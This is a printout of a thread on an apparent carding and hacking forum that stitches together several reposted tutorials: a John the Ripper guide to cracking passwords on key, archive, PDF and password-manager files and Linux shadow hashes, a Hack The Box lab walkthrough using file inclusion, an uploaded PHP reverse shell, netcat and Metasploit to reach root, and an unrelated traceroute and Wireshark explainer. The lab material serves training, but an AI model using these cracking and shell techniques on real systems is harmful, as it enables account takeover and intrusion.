[Guide] How to Beginners Guide for John the Ripper (Part 2)

[Guide] How to Beginners Guide for John the Ripper (Part 2) - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Beginners Guide for John the Ripper (Part 2) (/Thread-Guide-How-to-Beginners-Guide-for-John-the-Ripper-Part-2)

[Guide] How to Beginners Guide for John the Ripper (Part 2) - NINZA - 05-14-2020

We learned most of the basic information on John the Ripper in our Previous Article which can be found here. In this article, we will use John the Ripper to crack the password hashes of some of the file formats like zip, rar, pdf and much more.

To crack these password hashes, we are going to use some of the inbuilt and some other utilities which extract the password hash from the locked file. There are some utilities that come inbuilt with John which can be found using the following command.

locate *2john
1
locate *2john

As you can see that we have the following utilities, we will demonstrate some of them here.

[Image: 1.png?w=687&ssl=1]

Cracking the SSH Password Hash

John the Ripper can crack the SSH private key which is created in RSA Encryption. To test the cracking of the private key, first, we will have to create a set of new private keys. To do this we will use a utility that comes with ssh, called “ssh-keygen”.

ssh-keygen
1
ssh-keygen

[Image: 2.png?w=687&ssl=1]

After opening, it asks for the location at which we want the public/private RSA key pair to store? You can use any location or you can leave it as default.

After that it asks for the passphrase, after entering the password again, we successfully generate the RSA private key. (Refer the image)

When you will try to open the file, you will be greeted by the following prompt.

[Image: 3.png?w=687&ssl=1]

Now John cannot directly crack this key, first, we will have to change its format, which can be done using a john utility called “ssh2john”.

Syntax: ssh2john [location of key]

ssh2john /home/pavan/.ssh/id_rsa > crack.txt
1
ssh2john /home/pavan/.ssh/id_rsa > crack.txt

[Image: 4.png?w=687&ssl=1]

You can see that we converted the key to a crackable hash and then entered it into a text file named id_rsa.txt.

Now let’s use John the Ripper to crack this hash.

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.txt
1
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.txt

Great! We have successfully cracked the passphrase used to create the private ssh key to be “password123”

[Image: 5.png?w=687&ssl=1]

Cracking the KeepPass2 Password Hash

John the Ripper can crack the KeepPass2 key. To test the cracking of the key, first, we will have to create a set of new keys. To do this we will use a utility that is called “kpcli”.

kpcli
1
kpcli

[Image: 6.png?w=687&ssl=1]

Now we will create a database file using the command “save as” and naming the database file as ignite.kdb and entering a passcode to secure it.

When you will try to open the file, you will be greeted by the following prompt.

[Image: 7.png?w=687&ssl=1]

Now John cannot directly crack this key, first, we will have to change its format, which can be done using a john utility called “keepass2john”.

Syntax: keepass2john [location of key]

keepass2john ignite.kdb > crack.txt
1
keepass2john ignite.kdb > crack.txt

[Image: 8.png?w=687&ssl=1]

Now let’s use John the Ripper to crack this hash.

john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
1
john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

Great! We have successfully cracked the passphrase used to create the key to be “12345678”

[Image: 9.png?w=687&ssl=1]

Cracking the RAR Password Hash

Now we will crack some compressed files, to do that we will have to create a file to be compressed so let’s do that using echo command as shown in the given screenshot.

You can see that we created a file.txt which we will be using to create compressed files.

echo hackingarticles.in > file.txt
1
echo hackingarticles.in > file.txt

[Image: 10.png?w=687&ssl=1]

John the Ripper can crack the RAR file passwords. To test the cracking of the password, first, let’s create a compressed encrypted rar file.

rar a -hpabc123 file.rar file.txt
1
rar a -hpabc123 file.rar file.txt

[Image: 11.png?w=687&ssl=1]

a = Add files to archive
hp[password] = Encrypt both file data and headers

This will compress and encrypt our file.txt into a file.rar. So, when you will try to open the file, you will be greeted by the following prompt.

[Image: 12.png?w=687&ssl=1]

Now John cannot directly crack this key, first, we will have to change it format, which can be done using a john utility called “rar2john”.

Syntax: rar2john [location of key]

rar2john file.rar > crack.txt
1
rar2john file.rar > crack.txt

[Image: 13.png?w=687&ssl=1]

Cracking the ZIP Password Hash

John the Ripper can crack the ZIP file passwords. To test the cracking of the password, first, let’s create a compressed encrypted zip file.

zip -er file.zip file.txt
1
zip -er file.zip file.txt

[Image: 15.png?w=687&ssl=1]

e = Encrypt
r = Recurse into directories

This will compress and encrypt our file.txt into a file.zip. So, when you will try to open the file, you will be greeted by the following prompt.

[Image: 16.png?w=687&ssl=1]

Now John cannot directly crack this key, first, we will have to change its format, which can be done using a john utility called “zip2john”.

Syntax: zip2john [location of key]

zip2john file.zip > crack.txt
1
zip2john file.zip > crack.txt

[Image: 17.png?w=687&ssl=1]

Cracking the 7-Zip Password Hash

John the Ripper can crack the 7-Zip file passwords. To test the cracking of the password, first, let’s create a compressed encrypted 7z file.

7z a -mhe file.7z file.txt -p"password"
1
7z a -mhe file.7z file.txt -p"password"

[Image: 19.png?w=687&ssl=1]

a = Add files to archive
m = Set compression Method
h = Calculate hash values for files
e = Encrypt file
p = set Password

This will compress and encrypt our file.txt into a file.7z. So, when you will try to open the file, you will be greeted by the following prompt.

[Image: 20.png?w=687&ssl=1]

Now John cannot directly crack this key, first, we will change its format, which can be done using a john utility called “7z2john”. This is not inbuilt utility, It can be downloaded from

[To see content please register here]

.

Syntax: zip2john [location of key]

python 7z2john.py file.7z > crack.txt
1
python 7z2john.py file.7z > crack.txt

[Image: 21.png?w=687&ssl=1]

Now let’s use John the Ripper to crack this hash.

john –wordlist=/usr/share/wordlists/rockyou.txt crack.txt
1
john –wordlist=/usr/share/wordlists/rockyou.txt crack.txt

Great! We have successfully cracked the passphrase used to create the key to be “password”

[Image: 22.png?w=687&ssl=1]

Cracking the PDF Password Hash

John the Ripper can crack the PDF file passwords. You can encrypt your pdf online by using

[To see content please register here]

. This will compress and encrypt our pdf into a password protected file.pdf. So, when you will try to open the file, you will be greeted by the following prompt.

[Image: 23.png?w=687&ssl=1]

Now John cannot directly crack this key, first, we will have to change its format, which can be done using a john utility called “pdf2john”. This is not an inbuilt utility, it can be downloaded from

[To see content please register here]

.

Syntax: pdf2john [location of key]

python pdf2john.py file.pdf > crack.txt
1
python pdf2john.py file.pdf > crack.txt

[Image: 24.png?w=687&ssl=1]

Cracking the PuTTY Password Hash

John the Ripper can crack the PuTTY private key which is created in RSA Encryption. To test the cracking of the private key, first, we will have to create a set of new private keys. To do this we will use a utility that comes with PuTTY, called “PuTTY Key Generator”.

[Image: 29.PNG?w=687&ssl=1]

Click on “Generate”. After Generating the key, we get a window where we will input the key passphrase as shown in the image.

[Image: 30.PNG?w=687&ssl=1]

After entering the passphrase, click on Save private key to get a private key in the form of a .ppk file

After generating transfer this .ppk file to Kali Linux.

Now John cannot directly crack this key, first, we will have to change its format, which can be done using a john utility called “putty2john”.

Syntax: putty2john [location of key]

putty2john file.ppk > crack.txt
1
putty2john file.ppk > crack.txt

[Image: 31.png?w=687&ssl=1]

You can see that we converted the key to a crackable hash and then entered it into a text file named crack.txt.

Now let’s use John the Ripper to crack this hash.

john –w=/usr/share/wordlists/rockyou.txt crack.txt
1
john –w=/usr/share/wordlists/rockyou.txt crack.txt

Great! We have successfully cracked the passphrase used to create the private PuTTY key to be “password”.

[Image: 32.png?w=687&ssl=1]

Cracking the “Password Safe” Password Hash

John the Ripper can crack the Password Safe Software’s key. To test the cracking of the key, first, we will have to create a set of new keys. To do this we will install the Password Safe Software on our Windows 10 System.

[Image: 33.PNG?w=687&ssl=1]

To get a new key, Click on “New”

[Image: 34.PNG?w=687&ssl=1]

In this prompt, check the Show Combination Box. After that Enter the passphrase you want to use to generate the key. This will generate a .psafe3 file.

After generating transfer this .safe3 file to Kali Linux.

Now John cannot directly crack this key, first, we will have to change its format, which can be done using a john utility called “pwsafe2john”.

Syntax: pwsafe2john [location of key]

pwsafe2john ignite.psafe3 > crack.txt
1
pwsafe2john ignite.psafe3 > crack.txt

[Image: 35.png?w=687&ssl=1]

You can see that we converted the key to a crackable hash and then entered it into a text file named crack.txt.

Now let’s use John the Ripper to crack this hash.

john –w=/usr/share/wordlists/rockyou.txt crack.txt
1
john –w=/usr/share/wordlists/rockyou.txt crack.txt

Great! We have successfully cracked the passphrase used to create the private pwsafe key to be “password123”

[Image: 36.png?w=687&ssl=1]

Today we are sharing our experience that can be helpful in solving new CTF challenge: Crimestoppers of Hack The Box. Solving this lab is not much easy, all you need is your penetration skill to solve this challenge.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Penetrating Methodology

Network Scanning
Enumeration
Exploiting Web Applications
Capture user.txt
Privilege Escalation
Capture root.txt Flag

Let’s Begin!!

Network Scanning

These labs are only available online, therefore, they have a static IP. Crimestoppers has IP: 10.10.10.80.

As we knew the initial stage is enumeration; therefore use nmap Aggressive scan for gathering target’s machine and running services information.

nmap -A 10.10.10.80
1
nmap -A 10.10.10.80

[Image: 1.png?w=687&ssl=1]

Knowing port 80 was open on victim’s network we preferred to explore his IP in the browser and the following image opened as shown below. Here, we can see that it has two pages: home and upload but didn’t find anything suspicious.

[Image: 2.png?w=687&ssl=1]

Enumeration

So next, we use the dirb tool of kali to enumerate the directories and found some important directories such as

[To see content please register here]

and went on the web browser to explore them.

[Image: 3.1.png?w=687&ssl=1]

At upload, you can upload any comment as a Tip, in order to provide some information. So we try to upload malicious code here but get failed each time.

If you will observe the URL http:// 10.10.10.80/?op=upload then you will realize that its look like that LFI.

[Image: 3.png?w=687&ssl=1]

But it was not easy that much to exact information by exploiting LFI with help of ../etc/password therefore by making little bit more effort and taking help from my previous

[To see content please register here]

. We used curl command to find out the data from inside it with the help of PHP base64-encode.

curl

[To see content please register here]

=php://filter/convert.base64-encode/resource=upload
1
curl

[To see content please register here]

=php://filter/convert.base64-encode/resource=upload

As result, it returns base64 encode text which we need to decode.

[Image: 5.png?w=687&ssl=1]

To decode base64 encoded text follow below syntax and found a PHP script that was pointing toward some kind of token and secretname which was a link to uploads directory.

Syntax: echo BASE64TEXT | base64 -d

[Image: 6.png?w=687&ssl=1]

After struggling a lot, finally, we successfully uploaded our PHP backdoor with help burp suite. Follow the given step to upload PHP web shell.

Open php-reverse-shell.php which is inbuilt in Kali Linux from path: /user/share/webshells/php and modify ATTACKER’s IP and save this file on the desktop. Here we have renamed it as shell.php and compress this file.

zip -0 shell.zip shell.php
1
zip -0 shell.zip shell.php

[Image: 8.png?w=687&ssl=1]

Exploiting Web Application

In order to capture the request web browser, enter the information for Tips and name then turn burp suite and click on Send Tip.

[Image: 9.png?w=687&ssl=1]

Now in order to upload the content of our php backdoor through burp select the string “shell” for name = tip as shown below.

[Image: 10.png?w=687&ssl=1]

And choose php file to paste it content at the place of shell.

[Image: 11.png?w=687&ssl=1]

As you can observe that we have successfully uploaded our malicious PHP content here.

[Image: 12.png?w=687&ssl=1]

Now forward the intercepted request and you will get secretname for the uploaded file as highlighted, copy it. Then forward the request again, it will give the success.txt message and at last forward the request one more time.

[Image: 13.png?w=687&ssl=1]

Do not forget to launch netcat for reverse connection before executing your uploaded file.

nc -lvp 1234
1
nc -lvp 1234

Now open the browser and execute the following command that contains secretname of the uploaded file (PHP backdoor) and you will get netcat session for reverse connection.

[To see content please register here]

python -c 'import pty; pty.spawn("/bin/sh")'
1
2

[To see content please register here]

python -c 'import pty; pty.spawn("/bin/sh")'

[Image: 14.png?w=687&ssl=1]

Because we love to work with meterpreter session therefore with help of Metasploit web_delivary module we generate malicious python code as shown.

msf exploit(multi/script/web_delivery) > set lhost 10.10.14.25
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.25
msf exploit(multi/script/web_delivery) > exploit
1
2
3
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.25
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.25
msf exploit(multi/script/web_delivery) > exploit

[Image: 15.png?w=687&ssl=1]

Paste copied code in netcat which will provide meterpreter session inside Metasploit framework.

[Image: 16.png?w=687&ssl=1]

HURRAYYYY!!! We got our meterpreter session, now let’s grab the user.txt file first.

Inside path: /home/dom I found user.txt file and used cat “filename” command for reading this file.

cd home
ls
cd dom
ls
cat user.txt
1
2
3
4
5
cd home
ls
cd dom
ls
cat user.txt

Great!! We got our 1st flag successfully

[Image: 17.png?w=687&ssl=1]

Privilege Escalation

Now we need to find the root.txt file to finish this challenge and believe me it was not easy until you want the hint which is hidden by the author. We try every possible method to escalated privilege to gain the root access but it was quite different from previous experience.

After penetrating more and more we found a “36jinndk.default” from inside /home/dom/.thunderbird, which was encrypted file for Thunderbird profile, therefore, we download it in our local system.

meterpreter> download 36jinndk.default /root/Desktop/36
1
meterpreter> download 36jinndk.default /root/Desktop/36

[Image: 18.png?w=687&ssl=1]

Since it was encrypted file of Thunderbird profile so with help of Google we found a python script from this Link:

[To see content please register here]

for its decryption.

With help of the following command, we successfully found password: Gummer59

python firefox_decrypt.py /root/Desktop/36
1
python firefox_decrypt.py /root/Desktop/36

[Image: 19.png?w=687&ssl=1]

We applied this password to the escalated user: dom with help of the following command and then move into crimestoppers.htb directory it looks like his mailbox directory where we found so many files such INBOX.

su dome
Password:
cd /home/dom/.thunderbird/36jinndk.default/ImapMail/crimestoppers.htb
1
2
3
su dome
Password:
cd /home/dom/.thunderbird/36jinndk.default/ImapMail/crimestoppers.htb

[Image: 20.png?w=687&ssl=1]

First, we look into INBOX for any hint for root.txt but didn’t find something related to root.txt flag similarly we open other files but didn’t find anything.

[Image: 21.png?w=687&ssl=1]

At last, we open Drafts-1 and read the following line which looks like a hint of root access.

“I don’t trust them and run rkhunter, it reported that there a rootkit installed called:apache_modrootme backdoor” and its execution method.

[Image: 22.png?w=687&ssl=1]

So we explore following the path and we found access.log.2.gz file since it was a compressed file, therefore, it was better to copy it inside /tmp for further steps.

cd /var/log/apache2
cp access.log.2.gz/tmp
1
2
cd /var/log/apache2
cp access.log.2.gz/tmp

Now let’s move inside /tmp to extract the copied file inside it with the help of gunzip.

gunzip access.log.2.gz
ls
cat access.log.2.gz
1
2
3
gunzip access.log.2.gz
ls
cat access.log.2.gz

You can observe the log for a command “FunSociety” which has been executed several times.

[Image: 23.png?w=687&ssl=1]

As per the message read from DRAFT-1 we run netcat on localhost on port 80 get root access with help of following commands when executed.

nc localhost 80
get FunSociety
get FunSociety
id
1
2
3
4
nc localhost 80
get FunSociety
get FunSociety
id

Now let’s get the root.txt and finish this task.

cd /root
cat root.txt
1
2
cd /root
cat root.txt

BOOOOOM!!!! We hit the Goal and completed both task.

[Image: 24.png?w=687&ssl=1]

In this Post, we are going to discuss working with traceroute using UDP/ICMP/TCP packets with the help of Wireshark.

Traceroute or Tracert: It is a CUI based computer network diagnostic tools used in UNIX and Windows-like system respectively. It traces the path of a packet from the source machine to an Internet host such as Google.com by calculating the average time taken each hop. Traceroute sends a UDP packet to the destination by taking benefit of ICMP’s messages. It uses the ICMP error-reporting messages –Destination Unreachable and Time exceeded.

TTL: The time-to-live value, also known as the hop limit, is a mechanism that limits the lifespan or lifetime of data in a computer or network.

Hop: A hop is one portion of the path between source and destination. Data packets pass through bridges, routers, and gateways as they travel between source and destination. On the internet, before the data reaches its final destination, it goes through several routers and a hop occurs when an incoming packet is forwarded to the next router.

The asterisk (*): Denotes probe timeout which means that the router at that hop doesn’t respond to the packet received from the source used for the traceroute due to firewall filter.

Working of Traceroute

[Image: 0.png?w=687&ssl=1]

Read the below steps:

Traceroute sends a UDP packet with a TTL = 1 from the source to destination.
When the first router receives the UDP packet it reduces the TTL value by 1 (1-1=0) then drop the packet and sends an ICMP message “Time exceeded” to the source. Thus Traceroute makes a list of the router’s address and the time taken for the round-trip.

The TTL time exceeded ICMP message is sent after the TTL value of a UDP packet gets zero. In typical condition, a network doesn’t have such a diameter that lead the TTL=0. This could be possible when there is a routing loop. In this case, as the packet is sent back and forth between the looping points, the TTL keeps getting decrement until it becomes zero. And at last, the source receives ICMP error message sent by the router.

Again source device sends two more packets, in the same way, to get an average value of the round-trip time and again TTL gets zero when it reaches to the 2nd router and response through ICMP error message time exceeds.
Traceroute keeps on doing this, and record the IP address and name of every router until the UDP packets reach to the destination address. Once it reaches at the destination address, Time exceeded ICMP message is NOT sent back to the source.
Since Traceroute uses the random port for sending UDP packets as result destination machine will drop the packet and send a new ICMP error message-Destination Unreachable to the source which indicates the UDP packets has reached to the destination address.

Tracert with Wireshark

As discussed above tracert is CLI utility for windows system to trace the path of a packet from source to destination. So herewith help of the following command, we can observe the path of the packet which travels to reach Google DNS.

Syntax: tracert [options] Host IP

tracert 8.8.8.8
1
tracert 8.8.8.8

or

tracert -d 8.8.8.8
1
tracert -d 8.8.8.8

Traceroute generates a list of each hop by entering IP of routers that traversed between source and destination and average round-trip time. As a result hop 22 denotes entry of destination i.e. Google DNS.

In order to notice the activity of traceroute, we have turned on Wireshark in the background.

Note: Result of tracert can vary each time for hop count but does not go beyond 30 hops because it is the maximum hop limit.

[Image: 1.png?w=687&ssl=1]

At Wireshark we notice the following points:

ICMP echo request packet is used instead of UDP to send DNS query.
The packet first goes from source 192.168.1.101 to first router 192.168.1.1 having ICMP echo request packet with TTL=1
The router will drop that packet and send ICMP Time Exceeded error message to the source.
All this happens 3 times before the source machine sends next packet by incrementing TTL value by 1 i.e. TTL=2.

Form this image we can observe ICMP echo reply message is sent from 8.8.8.8 (destination) to 192.168.1.101 (source) for TTL 22.

[Image: 3.png?w=687&ssl=1]

Traceroute with Wireshark (via UDP packets)

As discussed above traceroute in utility for Unix -like the system to trace the path of a packet from source to destination. So here with the help of the following command, we can observe the path of packet travels to reach Google DNS.

Syntax: traceroute [options] Host IP

traceroute 8.8.8.8
1
traceroute 8.8.8.8

[Image: 4.png?w=687&ssl=1]

Traceroute generates a list of each hop by entering IP of routers that comes between source and destination and average round-trip time. As a result hop 21 denotes entry of destination i.e. Google DNS.

In order to notice the activity of traceroute, we have turned on Wireshark in the background.

Note: Result of traceroute can vary each time for hop count but does not go beyond 30 hops because it is maximum hop limit.

At Wireshark we notice the following points:

UDP packet is used to send DNS query with help of 32-bit payload.
The packet first goes from source 192.168.1.101 to first router 192.168.1.1 having ICMP request packet with TTL=1
The router will drop that packet and send ICMP Time Exceeded error message to the source.
All this happens 3 times before the source sent next packet with increment TTL value by 1 i.e. TTL=2.

In tracert we have seen that each TTL value between source to the first router proceeds 3 times, similarly, same technique is followed by UDP. To demonstrate this we have explored UDP packets 5,6,7 and 8th continuously.

In the 5th packet, we observe the UDP packet sent by source (192.168.1.102) to destination 8.8.8.8 on port 33435 and count as Hop #1, attempt #1.

[Image: 6.png?w=687&ssl=1]

In the 6th packet, we observe the UDP packet sent by source (192.168.1.102) to destination 8.8.8.8 on port 33436 and count as Hop #1, attempt #2.

[Image: 7.png?w=687&ssl=1]

Similarly, in the 7th packet, we observe the UDP packet sent by source (192.168.1.102) to destination 8.8.8.8 on port 33437 and count as Hop #1, attempt #3.

[Image: 8.png?w=687&ssl=1]

In the 8th packet, we observe the UDP packet sent by source (192.168.1.102) to destination 8.8.8.8 on port 33436 and count as Hop #2, attempt #1 and repeat so on process till reaches the destination.

[Image: 9.png?w=687&ssl=1]

In packet 79th we observe that the last hop captured was hop #10 attempt #3 when the UDP packet sent by source (192.168.1.102) to destination 8.8.8.8 on port 33464 and Time exceeded ICMP message is NOT sent back to the source after this.

[Image: 10.png?w=687&ssl=1]

As a result, at last, source received ICMP message Destination Port Unreachable which means our UDP packet reaches on the destination address.

At last from given below image we observed the following:

Source sent DNS query to the router for DNS lookup 8.8.8.8
Router sent a response to source as the answer of DNS Name Google-Public-DNS-google.com

Traceroute with Wireshark (via ICMP packets)

As you know by default traceroute use UDP packet but with help of -I option you can make it work as tracert which uses ICMP request packet.

traceroute -I 8.8.8.8
1
traceroute -I 8.8.8.8

[Image: 12.png?w=687&ssl=1]

It generates a list of each hop by entering IP of routers that comes between source and destination and average round-trip time. As a result hop 22 denotes entry of destination i.e. Google DNS. In order to notice the activity of traceroute, we have turned on Wireshark in the background.

At Wireshark we notice the following points:

First ICMP echo request packet will be sent to the first router with TTL 1 and it will send back an ICMP error message time exceed which follow the same technique as explained above in tracert with Wireshark.

At last from given below image we observed the following:

ICMP echo reply message is sent from 8.8.8.8 (destination) to 192.168.1.101 (source) for TTL 22.
Source sent DNS query to the router for DNS lookup 8.8.8.8
Router sent the response to source as the answer of DNS Name Google-Public-DNS-google.com

Traceroute with Wireshark (via TCP packets)

As you know by default traceroute use UDP packet with the use of ICMP error message for generating a response but with the help of -T option, you can use TCP packet, which uses syn request packet via port 80. It is most useful in diagnosing connection issues to a specific service eg. Web server.

tcptraceroute - 8.8.8.8
or
traceroute -T 8.8.8.8
1
2
3
tcptraceroute - 8.8.8.8
or
traceroute -T 8.8.8.8

As we know the maximum hop limit is 30 and but here till 30th hop we didn’t find desirable output. TCP traceroute basically follow TCP half communication and waits for the sys-ack packet from destination till the last hop.

[Image: 14.png?w=687&ssl=1]

In order to notice the activity of tcp traceroute, we have turned on Wireshark in the background where we noticed that it works same as UDP but here the syn packets are used to send the requests to the destination. Tcptraceroute does not measure the time it takes to complete the three-way handshake because that never occurs in such a situation. It only measures the time from the initial SYN to the SYN/ACK.

Since Wireshark also didn’t notice any syn-ack packet from destination to source, therefore, Tcptraceroute didn’t edit destination response in its record list this is due to because it is useful while diagnosing web server.

[Image: 15.png?w=687&ssl=1]

Therefore let’s check the path of Google.com and notice the behavior of tcptraceroute. And you compare both result and behaviour of TCP in case of Google DNS server and Google web server.

tcptraceroute google.com
1
tcptraceroute google.com

Here we can clearly observe the response of destination machine through SYN, ACK and a complete entry recorded by traceroute.

[Image: 16.png?w=687&ssl=1]

It is as similar as above, the source sent the TCP-SYN packet to the destination machine on port 80 and received ICMP error message from the router for a time exceeded and repeat the process till it receives ACK_SYN from the destination.

[Image: 17.png?w=687&ssl=1]

Here we can observe ACK-SYN packet from the destination (172.168.161.14) is sent to source (192.1681.103) from port 80 and source again sent RST packet to the destination via port 80.

[Image: 18.png?w=687&ssl=1]

At last from given below image we observed the following:

Source sent DNS query to the router for DNS lookup 172.161.217.14
Router sent the response to source as the answer of DNS Name del03s10-in-f14.1e100.net

This entry will get recorded by traceroute in its record list.

We know the importance of John the ripper in penetration testing, as it is quite popular among password cracking tool. In this article, we are introducing John the ripper and its various usage for beginners.

What is John the Ripper?

John the Ripper is a free password cracking software tool developed by

[To see content please register here]

. Originally developed for Unix Operating Systems but later on developed for other platforms as well. It is one of the most popular password testings and breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types commonly found in Linux or Windows. It can also be to crack passwords of Compressed files like ZIP and also Documents files like PDF.

Where to get John the Ripper?

John the Ripper can be downloaded from Openwall’s Website

[To see content please register here]

.

Or from the Official John the Ripper Repo

[To see content please register here]

John the Ripper comes pre-installed in Linux Kali and can be run from the terminal as shown below:

[Image: 1.png?w=687&ssl=1]

John the Ripper works in 3 distinct modes to crack the passwords:

Single Crack Mode
Wordlist Crack Mode
Incremental Mode

John the Ripper Single Crack Mode

In this mode John the ripper makes use of the information available to it in the form of a username and other information. This can be used to crack the password files with the format of

Username Tongue

assword
1
Username Tongue

assword

For Example: If the username is “Hacker” it would try the following passwords:

hacker

HACKER

hacker1

h-acker

hacker=

We can use john the ripper in Single Crack Mode as follows:

Here we have a text file named crack.txt containing the username and password, where the password is encrypted in SHA1 encryption so to crack this password we will use:

Syntax: john [mode/option] [password file]

john --single --format=raw-sha1 crack.txt
1
john --single --format=raw-sha1 crack.txt

As you can see in the screenshot that we have successfully cracked the password.

Username: ignite

Password: IgNiTe

[Image: 2.png?w=687&ssl=1]

John the Ripper Wordlist Crack Mode

In this mode John the ripper uses a wordlist that can also be called a Dictionary and it compares the hashes of the words present in the Dictionary with the password hash. We can use any desired wordlist. John also comes in build with a password.lst which contains most of the common passwords.

Let’s see how John the Ripper cracks passwords in Wordlist Crack Mode:

Here we have a text file named crack.txt containing the username and password, where the password is encrypted in SHA1 encryption so to crack this password we will use:

Syntax: john [wordlist] [options] [password file]

john --wordlist=/usr/share/john/password.lst --format=raw-sha1 crack.txt
1
john --wordlist=/usr/share/john/password.lst --format=raw-sha1 crack.txt

As you can see in the screenshot, john the Ripper have cracked our password to be asdfasdf

[Image: 3.png?w=687&ssl=1]

Cracking the User Credentials

We are going to demonstrate two ways in which we will crack the user credentials of a Linux user.

Before that we will have to understand, what is a shadow file?

In the Linux operating system, a shadow password file is a system file in which encrypted user password is stored so that they are not available to the people who try to break into the system. It is located at /etc/shadow.

First Method

Now, for the first method, we will crack the credentials of a particular user “pavan”.

Now to do this First we will open the shadow file as shown in the image.

[Image: 4.png?w=687&ssl=1]

And we will find the credentials of the user pavan and copy it from here and paste it into a text file. Here we have the file named crack.txt.

[Image: 5.png?w=687&ssl=1]

Now we will use john the ripper to crack it.

john crack.txt
1
john crack.txt

As you can see in the image below that john the ripper has successfully cracked the password for the user pavan.

[Image: 6.png?w=687&ssl=1]

Second Method

Now, for the second method, we will collectively crack the credentials for all the users.

To do this we will have to use John the ripper utility called “unshadow”.

unshadow /etc/passwd /etc/shadow > crack.txt
1
unshadow /etc/passwd /etc/shadow > crack.txt

[Image: 7.png?w=687&ssl=1]

Here the unshadow command is combining the /etc/passwd and /etc/shadow files so that John can use them to crack them. We are using both files so that John can use the information provided to efficiently crack the credentials of all users.

Here is how the crack file looks after unshadow command.

[Image: 8.png?w=687&ssl=1]

Now we will use john to crack the user credentials of all the users collectively.

john --wordlist=/usr/share/john/password.lst crack.txt
1
john --wordlist=/usr/share/john/password.lst crack.txt

[Image: 9.png?w=687&ssl=1]

As you can see from the provided image that we have discovered the following credentials:

User

Password

Raj

123

Pavan

Asdfasdf

Ignite

Yellow

Stopping and Restoring Cracking

While John the ripper is working on cracking some passwords we can interrupt or pause the cracking and Restore or Resume the Cracking again at our convenience.

So while John the Ripper is running you can interrupt the cracking by Pressing “q” or Crtl+C as shown in the given image.

[Image: 10.png?w=687&ssl=1]

Now to resume or restore the cracking process we will use the –restore option of John the ripper as shown :

john --restore
1
john --restore

[Image: 11.png?w=687&ssl=1]

Now we will decrypt various hashes using John the Ripper

SHA1

To decrypt SHA1 encryption we will use RockYou as wordlist and crack the password as shown below:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 crack.txt
1
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 crack.txt

As you can see in the given image that we have the username pavan and password as Hacker

[Image: 12.png?w=687&ssl=1]

MD5

To decrypt MD5 encryption we will use RockYou as wordlist and crack the password as shown below:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 rack.txt
1
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 rack.txt

As you can see in the given screenshot that we have the username pavan and password as P@ssword.

[Image: 13.png?w=687&ssl=1]

MD4

To decrypt MD4 encryption we will use RockYou as wordlist and crack the password as shown below:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md4 crack.txt
1
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md4 crack.txt

As you can see in the given screenshot that we have the username pavan and password as Rockyou

[Image: 14.png?w=687&ssl=1]

SHA256

To decrypt SHA256 encryption we will use RockYou as wordlist and crack the password as shown below:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256 crack.txt
1
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256 crack.txt

As you can see in the given screenshot that we have the username pavan and password as pAsSwOrD

RIPEMD128

To decrypt RIPEMD128 encryption we will use RockYou as wordlist and crack the password as shown below:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=ripemd-128 crack.txt
1
john --wordlist=/usr/share/wordlists/rockyou.txt --format=ripemd-128 crack.txt

As you can see in the given image that we have the username pavan and password as password123

[Image: 15.png?w=687&ssl=1]

Whirlpool

To decrypt whirlpool encryption we will use RockYou as wordlist and crack the password as shown below:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=whirlpool crack.txt
1
john --wordlist=/usr/share/wordlists/rockyou.txt --format=whirlpool crack.txt

As you can see in the given screenshot that we have the username pavan and password as password666

[Image: 17.png?w=687&ssl=1]

View All Formats

John the Ripper supports much encryption some of which we showed above. To view all the formats it supports:

john --list=formats
1
john --list=formats

Hope, you can take reference of this article while using John the ripper, More on John the Ripper will be in the Next Part.

[Image: 18.png?w=687&ssl=1]